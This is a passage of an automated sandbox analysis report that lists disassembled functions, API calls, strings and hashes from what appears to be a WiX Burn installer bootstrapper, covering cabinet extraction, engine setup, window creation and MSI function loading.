d21224-d21229 1340->1353 1354 d21255-d2125a 1340->1354 1355 d2126a-d2126c 1340->1355 1356 d2122b-d21230 1340->1356 1357 d21239-d2123e 1340->1357 1358 d2124e-d21253 1340->1358 1359 d2125c-d21261 1340->1359 1360 d2121d-d21222 1340->1360 1341->1347 1344->1362 1345->1344 1347->1305 1347->1324 1349->1324 1350->1324 1351->1324 1352->1324 1353->1324 1354->1324 1355->1324 1356->1324 1357->1324 1358->1324 1359->1324 1360->1324 1362->1310
                                                            APIs
                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 00D2111D
                                                            • CoUninitialize.COMBASE ref: 00D21398
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 3442037557-1168358783
                                                            • Opcode ID: 8e66e43f408c54fb9ba658b2f153c940eab6b50c919ec04bfe5555be327ea433
                                                            • Instruction ID: da5ec597ce3bf5b5a3ff234280a1b3406cb54e9b7f13873cf5a69d62bf598fcb
                                                            • Opcode Fuzzy Hash: 8e66e43f408c54fb9ba658b2f153c940eab6b50c919ec04bfe5555be327ea433
                                                            • Instruction Fuzzy Hash: 5A514A3ED40271EBCF2096A8AC06E6B7A64DF71734B268366FD01FB291D665CD0085F9
                                                            Function 00D042D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1368 d042d7-d0432e InitializeCriticalSection * 2 call d14d05 * 2 1373 d04452-d0445c call d0b48b 1368->1373 1374 d04334 1368->1374 1379 d04461-d04465 1373->1379 1375 d0433a-d04347 1374->1375 1377 d04445-d0444c 1375->1377 1378 d0434d-d04379 lstrlenW * 2 CompareStringW 1375->1378 1377->1373 1377->1375 1380 d043cb-d043f7 lstrlenW * 2 CompareStringW 1378->1380 1381 d0437b-d0439e lstrlenW 1378->1381 1382 d04474-d0447c 1379->1382 1383 d04467-d04473 call d40237 1379->1383 1380->1377 1387 d043f9-d0441c lstrlenW 1380->1387 1384 d043a4-d043a9 1381->1384 1385 d0448a-d0449f call d03821 1381->1385 1383->1382 1384->1385 1388 d043af-d043bf call d029ce 1384->1388 1397 d044a4-d044ab 1385->1397 1391 d04422-d04427 1387->1391 1392 d044b6-d044d0 call d03821 1387->1392 1403 d043c5 1388->1403 1404 d0447f-d04488 1388->1404 1391->1392 1393 d0442d-d0443d call d029ce 1391->1393 1392->1397 1393->1404 1406 d0443f 1393->1406 1401 d044ac-d044b4 call d40237 1397->1401 1401->1382 1403->1380 1404->1401 1406->1377
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D04303
                                                            • InitializeCriticalSection.KERNEL32(000000D0,?,?,00D05266,?,?,00000000,?,?), ref: 00D0430C
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00D05266,?,?,00000000,?,?), ref: 00D04352
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D0435C
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D04370
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00D05266,?,?,00000000,?,?), ref: 00D04380
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00D05266,?,?,00000000,?,?), ref: 00D043D0
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D043DA
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00D05266,?,?,00000000,?,?), ref: 00D043EE
                                                            • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00D05266,?,?,00000000,?,?), ref: 00D043FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                            • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                            • API String ID: 3039292287-3209860532
                                                            • Opcode ID: cbaa1a7e779330029ae1b61049c11f6a501590530a6851c2ff08f9bf33a5e506
                                                            • Instruction ID: 3b78216798afc8d82ba1b41c085ed4b6c10e7082c7b39346fd19e6eca15e9b54
                                                            • Opcode Fuzzy Hash: cbaa1a7e779330029ae1b61049c11f6a501590530a6851c2ff08f9bf33a5e506
                                                            • Instruction Fuzzy Hash: 8A518FB1A40215BFCB249FA8DC86FAA776CEF14760F144116F658E72D0DBB0E950CAB4
                                                            Function 00D1E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1408 d1e7b4-d1e7f1 1409 d1e813-d1e834 RegisterClassW 1408->1409 1410 d1e7f3-d1e807 TlsSetValue 1408->1410 1412 d1e836-d1e840 GetLastError 1409->1412 1413 d1e86e-d1e8a5 CreateWindowExW 1409->1413 1410->1409 1411 d1e809-d1e80e 1410->1411 1416 d1e93d-d1e953 UnregisterClassW 1411->1416 1417 d1e842-d1e84b 1412->1417 1418 d1e84d 1412->1418 1414 d1e8a7-d1e8b1 GetLastError 1413->1414 1415 d1e8dc-d1e8f0 SetEvent 1413->1415 1419 d1e8b3-d1e8bc 1414->1419 1420 d1e8be 1414->1420 1421 d1e91c-d1e927 KiUserCallbackDispatcher 1415->1421 1417->1418 1422 d1e854-d1e869 call d03821 1418->1422 1423 d1e84f 1418->1423 1419->1420 1424 d1e8c0 1420->1424 1425 d1e8c5-d1e8da call d03821 1420->1425 1426 d1e8f2-d1e8f5 1421->1426 1427 d1e929 1421->1427 1433 d1e935-d1e93c call d40237 1422->1433 1423->1422 1424->1425 1425->1433 1431 d1e8f7-d1e906 IsDialogMessageW 1426->1431 1432 d1e92b-d1e930 1426->1432 1427->1416 1431->1421 1435 d1e908-d1e916 TranslateMessage DispatchMessageW 1431->1435 1432->1433 1433->1416 1435->1421
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,?), ref: 00D1E7FF
                                                            • RegisterClassW.USER32(?), ref: 00D1E82B
                                                            • GetLastError.KERNEL32 ref: 00D1E836
                                                            • CreateWindowExW.USER32(00000080,00D59E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00D1E89D
                                                            • GetLastError.KERNEL32 ref: 00D1E8A7
                                                            • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00D1E945
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                            • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                            • API String ID: 213125376-288575659
                                                            • Opcode ID: 260608234feec4334983d0c7932cb58931dd4b64db517082519f672c085b2255
                                                            • Instruction ID: cbce3fa0ca92b252117cb691f0faf8cc72e452b222f137dd5532b2b7ec9938af
                                                            • Opcode Fuzzy Hash: 260608234feec4334983d0c7932cb58931dd4b64db517082519f672c085b2255
                                                            • Instruction Fuzzy Hash: 52418176900215FBDB209FA5EC49ADEBFB8EF09760F144126FD05EA290DB70D9448BB0
                                                            Function 00D0C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1518 d0c28f-d0c2c1 1519 d0c2c3-d0c2e1 CreateFileW 1518->1519 1520 d0c32b-d0c347 GetCurrentProcess * 2 DuplicateHandle 1518->1520 1523 d0c383-d0c389 1519->1523 1524 d0c2e7-d0c2f1 GetLastError 1519->1524 1521 d0c381 1520->1521 1522 d0c349-d0c353 GetLastError 1520->1522 1521->1523 1525 d0c360 1522->1525 1526 d0c355-d0c35e 1522->1526 1529 d0c393 1523->1529 1530 d0c38b-d0c391 1523->1530 1527 d0c2f3-d0c2fc 1524->1527 1528 d0c2fe 1524->1528 1531 d0c362 1525->1531 1532 d0c367-d0c37f call d03821 1525->1532 1526->1525 1527->1528 1533 d0c300 1528->1533 1534 d0c305-d0c318 call d03821 1528->1534 1535 d0c395-d0c3a3 SetFilePointerEx 1529->1535 1530->1535 1531->1532 1549 d0c31d-d0c326 call d40237 1532->1549 1533->1534 1534->1549 1538 d0c3a5-d0c3af GetLastError 1535->1538 1539 d0c3da-d0c3e0 1535->1539 1540 d0c3b1-d0c3ba 1538->1540 1541 d0c3bc 1538->1541 1542 d0c3e2-d0c3e6 call d21741 1539->1542 1543 d0c3fe-d0c404 1539->1543 1540->1541 1546 d0c3c3-d0c3d8 call d03821 1541->1546 1547 d0c3be 1541->1547 1552 d0c3eb-d0c3ef 1542->1552 1556 d0c3f6-d0c3fd call d40237 1546->1556 1547->1546 1549->1543 1552->1543 1555 d0c3f1 1552->1555 1555->1556 1556->1543
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,00D0C47F,00D05405,?,?,00D05445), ref: 00D0C2D6
                                                            • GetLastError.KERNEL32(?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C2E7
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?), ref: 00D0C336
                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C33C
                                                            • DuplicateHandle.KERNELBASE(00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C33F
                                                            • GetLastError.KERNEL32(?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C349
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C39B
                                                            • GetLastError.KERNEL32(?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D0C3A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                            • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                            • API String ID: 2619879409-373955632
                                                            • Opcode ID: e330c1bea43905ecaba73b5137bc000954afbbd1b9c3d6bfd2bcafd70374c5d5
                                                            • Instruction ID: c4aead77b5c688cd8ccff462f03e132d4facaefc21a33cda4d52a3df21134877
                                                            • Opcode Fuzzy Hash: e330c1bea43905ecaba73b5137bc000954afbbd1b9c3d6bfd2bcafd70374c5d5
                                                            • Instruction Fuzzy Hash: C041D876160201ABDB209F298C49F1B7BA9EBD5720F258129FD18DB3D1D771C801DB70
                                                            Function 00D42AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1559 d42af7-d42b17 call d03838 1562 d42c21-d42c25 1559->1562 1563 d42b1d-d42b2b call d44a6c 1559->1563 1565 d42c27-d42c2a call d45636 1562->1565 1566 d42c2f-d42c35 1562->1566 1567 d42b30-d42b4f GetProcAddress 1563->1567 1565->1566 1569 d42b56-d42b6f GetProcAddress 1567->1569 1570 d42b51 1567->1570 1571 d42b76-d42b8f GetProcAddress 1569->1571 1572 d42b71 1569->1572 1570->1569 1573 d42b96-d42baf GetProcAddress 1571->1573 1574 d42b91 1571->1574 1572->1571 1575 d42bb6-d42bcf GetProcAddress 1573->1575 1576 d42bb1 1573->1576 1574->1573 1577 d42bd6-d42bef GetProcAddress 1575->1577 1578 d42bd1 1575->1578 1576->1575 1579 d42bf6-d42c10 GetProcAddress 1577->1579 1580 d42bf1 1577->1580 1578->1577 1581 d42c17 1579->1581 1582 d42c12 1579->1582 1580->1579 1581->1562 1582->1581
                                                            APIs
                                                              • Part of subcall function 00D03838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00D03877
                                                              • Part of subcall function 00D03838: GetLastError.KERNEL32 ref: 00D03881
                                                              • Part of subcall function 00D44A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00D44A9D
                                                            • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00D42B41
                                                            • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00D42B61
                                                            • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00D42B81
                                                            • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00D42BA1
                                                            • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00D42BC1
                                                            • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00D42BE1
                                                            • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00D42C01
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLast$DirectorySystem
                                                            • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                            • API String ID: 2510051996-1735120554
                                                            • Opcode ID: 49bca94655cf33cecfcf8ec79329cc74eca0e7b7f4e7c3765120ed556e3b6d33
                                                            • Instruction ID: c635043ddb248c8a896c6deefd9f49f40852992dccc6d945fceaaf73477dc5fc
                                                            • Opcode Fuzzy Hash: 49bca94655cf33cecfcf8ec79329cc74eca0e7b7f4e7c3765120ed556e3b6d33
                                                            • Instruction Fuzzy Hash: 80319070941709EFDB119FA0ED02B697BA4F724769F44017BE404DA270E7F248899F74
                                                            Function 00D4304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00D43609,00000000,?,00000000), ref: 00D43069
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00D2C025,?,00D05405,?,00000000,?), ref: 00D43075
                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00D430B5
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D430C1
                                                            • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00D430CC
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D430D6
                                                            • CoCreateInstance.OLE32(00D6B6B8,00000000,00000001,00D4B818,?,?,?,?,?,?,?,?,?,?,?,00D2C025), ref: 00D43111
                                                            • ExitProcess.KERNEL32 ref: 00D431C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                            • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                            • API String ID: 2124981135-499589564
                                                            • Opcode ID: d1594a7b2d184b468606eedc120e8b721fc0001cc3adf26dd0c1dbe5468deb05
                                                            • Instruction ID: 74c24571c44a7984d01aa4f7d9e0566b6b53d864c760d3d13cd74d2cb2ed9a0b
                                                            • Opcode Fuzzy Hash: d1594a7b2d184b468606eedc120e8b721fc0001cc3adf26dd0c1dbe5468deb05
                                                            • Instruction Fuzzy Hash: 6041CD35B00315ABDB20DFACC845BAEBBA8EF45720F154169E901EB350DBB1DE408BB0
                                                            Function 00D3FCAE Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 76libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00D3FCD6
                                                            • GetProcAddress.KERNEL32(SystemFunction041), ref: 00D3FCE8
                                                            • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00D3FD2B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00D3FD3F
                                                            • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00D3FD77
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00D3FD8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLast
                                                            • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$`+?s$cryputil.cpp
                                                            • API String ID: 4214558900-776468437
                                                            • Opcode ID: 01139f9f1962c065d10156a9af8f38a2f5c645de9a87a55e30b1b09b714b4ba4
                                                            • Instruction ID: 39f68d5c5d4ef50586bf50e8420a885294d2ac09ab72924d578a4b5821b13c8e
                                                            • Opcode Fuzzy Hash: 01139f9f1962c065d10156a9af8f38a2f5c645de9a87a55e30b1b09b714b4ba4
                                                            • Instruction Fuzzy Hash: 22216536D4133A9BC7219B55BD0D7966A94AB10B71F1A0133EC01E73A0EBE4DC85DAF4
                                                            Function 00D21741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,00D0C3EB,?,00000000,?,00D0C47F), ref: 00D21778
                                                            • GetLastError.KERNEL32(?,00D0C3EB,?,00000000,?,00D0C47F,00D05405,?,?,00D05445,00D05445,00000000,?,00000000), ref: 00D21781
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorEventLast
                                                            • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                            • API String ID: 545576003-938279966
                                                            • Opcode ID: ce9b0eaea214395aa4fd4835cb006c3d3e6f5025e9fba9a4742bc3a4d5137d17
                                                            • Instruction ID: e816fa17e976d1944d4313df1017b2f34c9af20496a537788ab0674be52f545c
                                                            • Opcode Fuzzy Hash: ce9b0eaea214395aa4fd4835cb006c3d3e6f5025e9fba9a4742bc3a4d5137d17
                                                            • Instruction Fuzzy Hash: E2210E7FD417367BD7211AA95C85F27A95CEF307B5B128222BD44BB280E750DC0489F1
                                                            Function 00D208C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00D208F2
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00D2090A
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00D2090F
                                                            • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00D20912
                                                            • GetLastError.KERNEL32(?,?), ref: 00D2091C
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00D2098B
                                                            • GetLastError.KERNEL32(?,?), ref: 00D20998
                                                            Strings
                                                            • Failed to add virtual file pointer for cab container., xrefs: 00D20971
                                                            • <the>.cab, xrefs: 00D208EB
                                                            • Failed to open cabinet file: %hs, xrefs: 00D209C9
                                                            • cabextract.cpp, xrefs: 00D20940, 00D209BC
                                                            • Failed to duplicate handle to cab container., xrefs: 00D2094A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                            • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                            • API String ID: 3030546534-3446344238
                                                            • Opcode ID: 5f2b84c48acbca619d8af1fd2c2d2ff2d87e6da4438874e11ff65c37941938e2
                                                            • Instruction ID: b90c5c2360ab4e9aa682d9a141d1def56750f95088ed79875930473f7819d1fe
                                                            • Opcode Fuzzy Hash: 5f2b84c48acbca619d8af1fd2c2d2ff2d87e6da4438874e11ff65c37941938e2
                                                            • Instruction Fuzzy Hash: 9431EF36941235BBEB205B989C49F9ABE6CEF15765F150212FE09BB282D7619D00CEF0
                                                            Function 00D13F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D13AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00D13FB5,feclient.dll,?,00000000,?,?,?,00D04B12), ref: 00D13B42
                                                            • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00D04B12,?,?,00D4B488,?,00000001,00000000,00000000), ref: 00D1404C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseSleep
                                                            • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                            • API String ID: 2834455192-2673269691
                                                            • Opcode ID: 12edf4d229c0e06d432dc84088b86d6c94081b3f6e9280701eca8a945ccf519a
                                                            • Instruction ID: 296a986c3605d454ac1ecf3cc4d79a8d98c221db5ee0f89a091535491747c98e
                                                            • Opcode Fuzzy Hash: 12edf4d229c0e06d432dc84088b86d6c94081b3f6e9280701eca8a945ccf519a
                                                            • Instruction Fuzzy Hash: EF618C71A00615BFDF229F64EC46BAA7BA8EF14390B194165FD05DB180EF70EDD086B1
                                                            Function 00D06DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000001,?,00000000,00D05445,00000006,?,00D082B9,?,?,?,00000000,00000000,00000001), ref: 00D06DC8
